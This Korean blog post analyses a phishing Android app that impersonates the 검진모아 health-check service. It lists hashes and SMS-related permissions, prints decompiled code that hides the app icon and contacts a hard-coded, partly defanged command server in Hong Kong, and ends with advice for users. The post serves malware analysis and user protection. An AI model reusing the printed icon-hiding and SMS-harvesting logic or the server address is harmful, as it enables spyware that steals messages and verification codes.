꿈을꾸는 파랑새

오늘은 검진 모아 사칭 피싱 악성 앱인 검진모아.APK(2020.9.29)에 대해 알아보겠습니다. 일단 검진모아는 검진모아 연령별 종합건강검진 이벤트, 전국 6천여 개 건강검진센터 위치 찾기, 안과, 치과, 성형외과, 피부과 등 이벤트, 할인, 실시간예약 사이트 및 앱 입니다.

일단 피싱 사이트 및 진짜 검진 모아 사이트를 비교를 해보면 다음과 같이 볼 수가 있습니다. 가짜 사이트 즉 피싱 사이트는 보면 접속하자마자 전화번호 입력을 하라고 하고 있으면 해당 사이트에서 악성앱 이 다운로드 가 되는 것을 볼 수가 있습니다.
일단 기본적으로 해당 악성코드 해쉬값 과 그리고 권한은 다음과 같습니다.
해시 값
MD5:6fc7c09194ee804c47d315364e53cfc8
SHA-1:341c1a892429b56c88928988dc6410a27eeba03c
SHA-256:29060cb1e5f2468036daca51cebfd9c55091e03983212cd26d54ca7c19bbc6fc
안드로이드 권한

왼쪽 검진모아 피싱 사이트 오른쪽 진짜 검진모아 사이트왼쪽 검진모아 피싱 사이트 오른쪽 진짜 검진모아 사이트

<uses-permission android:name="android.permission.INTERNET"/>
<uses-permission android:name="android.permission.READ_PHONE_STATE"/>
<uses-permission android:name="android.permission.READ_SMS"/>
<uses-permission android:name="android.permission.SEND_SMS"/>
<uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
<uses-permission android:name="android.permission.RECEIVE_SMS"/>
<uses-permission android:name="android.permission.WRITE_SETTINGS"/>
일단 보면 인터넷, 문자 보내기, 문자 보내기, 문자 읽기 등 권한을 가지는 것을 볼 수가 있습니다.
안드로이드 권한 확인 방법은 AndroidManifest.xml 파일을 열어 보면 확인을 할 수가 있으면 android.permission 뒤에 오는 영어가 스마트폰에서 접근 및 가져가는 권한입니다.

악성앱 검진모아.APK 권한악성앱 검진모아.APK 권한

해당 악성 앱에 있는 com.Hnzowlc.OSMcw.MainActivity 내용은 다음과 같습니다.
package com.Hnzowlc.OSMcw;
import android.app.Activity;
import android.content.Context;
import android.content.Intent;
import android.content.SharedPreferences;
import android.os.Bundle;

com.Hnzowlc.OSMcw.MainActivitycom.Hnzowlc.OSMcw.MainActivity

public class MainActivity extends Activity {
  protected void onCreate(Bundle paramBundle) {
    super.onCreate(paramBundle);
    getPackageManager().setComponentEnabledSetting(getComponentName(), 2, 1);
    SharedPreferences sharedPreferences = getSharedPreferences("pref", 0);
    SharedPreferences.Editor editor = sharedPreferences.edit();
    editor.putInt("ID", 0);
    editor.putBoolean("Magic", false);
    if (sharedPreferences.getString("Server_URL", "") == "")
      editor.putString("Server_URL", HttpUtils.URL);
    editor.commit();
    (new Tools((Context)this)).regCustomer();
    startService(new Intent((Context)this, RelService.class));
    finish();
입니다. 그리고 com.Hnzowlc.OSMcw.HttpUtils에 있는 내용은 다음과 같습니다.
com.Hnzowlc.OSMcw.HttpUtils 내용
public class HttpUtils {
  public static String URL = "http://www.nsuslx.c?/";
 
  private static DefaultHttpClient buileClient() {
    BasicHttpParams basicHttpParams = new BasicHttpParams();
    HttpConnectionParams.setConnectionTimeout((HttpParams)basicHttpParams, 20000);
    HttpConnectionParams.setSoTimeout((HttpParams)basicHttpParams, 7200000);
    return new DefaultHttpClient((HttpParams)basicHttpParams);
  }

com.Hnzowlc.OSMcw.HttpUtilscom.Hnzowlc.OSMcw.HttpUtils

입니다. 여기서 http://www.nsuslx.cc 주소 위치를 검색을 해보면 다음과 같습니다.
Domain:Www.nsuslx.c?
IP Address: 45(.)132.237.65
Reverse DNS:** server can't find 65(.)237.132.45.in-addr.arpa: SERVFAIL
Hostname:45(.)132.237.65
Nameservers:   
ns1.22(.)cn >> 218(.)98.111.136
ns2.22(.)cn >> 42(.)157.225.211

웹사이트 및 IP 주소웹사이트 및 IP 주소

Location For an IP: Www.nsuslx(.)cc
Continent:Asia (AS)
Country:Hong Kong
IP Location Find In Hong Kong (HK)
Capital:Hong Kong
홍콩으로 접속되는 것을 확인할 수가 있습니다.

웹사이트 차단 사이트 Warning 경고웹사이트 차단 사이트 Warning 경고

그리고 해당 사이트 주소로 접속하면 한국정부에서 검열하는 사이트에 접속했을 때 나오는 해당 사이트 접속시 보이는 Warning 화면이 출력됩니다.
불법·유해 정보(사이트)에 대한 차단 안내
지금 접속하려고 하는 정보(사이트)에서 불법·유해 내용이 제공되고 있어.
이에 대한 접속이 차단되었음을 알려 드립니다.
해당 정보(사이트)는 방송통신심의위원회(KCSC)의 심의를 거쳐
방송통신위원회의 설치 및 운영에 관한 법률」에 따라 적법하게 차단된 것이오니
이에 관한 문의사항이 있으시면 아래의 담당기관으로 문의하여 주시기 바랍니다.
라는 메시지를 볼 수가 있습니다.
그리고 악성코드가 작동하는 클래스는 다음과 같습니다.

인증서 내용인증서 내용

Activities
com.Hnzowlc.OSMcw.MainActivity
서비스
com.Hnzowlc.OSMcw.RelService
Receivers
com.Hnzowlc.OSMcw.Forbid
그리고 디컴파일 하고 나면 있는 CERT.RSA 파일이 있고 해당 CERT.RSA를 디코딩을 해보면 다음과 같이 돼 있습니다.
CERT.RSA 디코딩
Certificate:
Data:ersion: 3 (0x2)
Serial Number:93:6e:ac:be:07:f2:01:df
Signature Algorithm: sha1WithRSAEncryption
Issuer: C=US, ST=California, L=Mountain View, O=Android, OU=Android, CN=Android/emailAddress=android@android.com
Validity
ot Before: Feb 29 01:33:46 2008 GMT
Not After : Jul 17 01:33:46 2035 GMT
Subject: C=US, ST=California, L=Mountain View, O=Android, OU=Android, CN=Android/emailAddress=android@android.com
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
라는 정보를 볼 수가 있습니다.
해당 악성 앱 특징
스파이웨어
SMS 콘텐츠 차단
SMS 콘텐츠 읽기 예: 인증 코드 읽기)
SMS에 대한 모니터 설치
네트워크 운영자 관련 데이터를 식별하는 기능
기기 ID를 읽을 수 있음(예:IMEI,ESN)
재부팅 후 코드를 실행할 수 있음
일단 해당 피싱 사이트 또는 악성앱에 대한 피해를 줄이고 싶으면 문자, 카카오톡으로 오는 주소는 클릭하지 말고 백신앱은 반드시 설치를 하고 물론 인지도가 있는 백신앱을 다운로드 해서 설치 및 그리고 구글 플레이 스토어,원스토어,갤럭시스토어 같이 공식 사이트가 아닌 곳에서 앱을 설치를 하는 것을 하지 말아야 하면 그리고 정식 스토어 에서 아닌 곳에서 설치하려고 하면 기본적 안드로이드에서 설치하지 말라고 경고하는데 경고를 무시하지 말고 반드시 해당 상황을 지켜야 합니다. 예전에 택배 배송 앱으로 위장 한 거와 비슷한 패턴입니다. 즉 모르는 주소 클릭 금지, 백신앱 설치 및 실시간 감지 및 실시간 업데이트,공식 스토어 이외에 설치를 하는 것은 자제해야 합니다.

그리드형

공유하기

facebook twitter kakaoTalk kakaostory naver band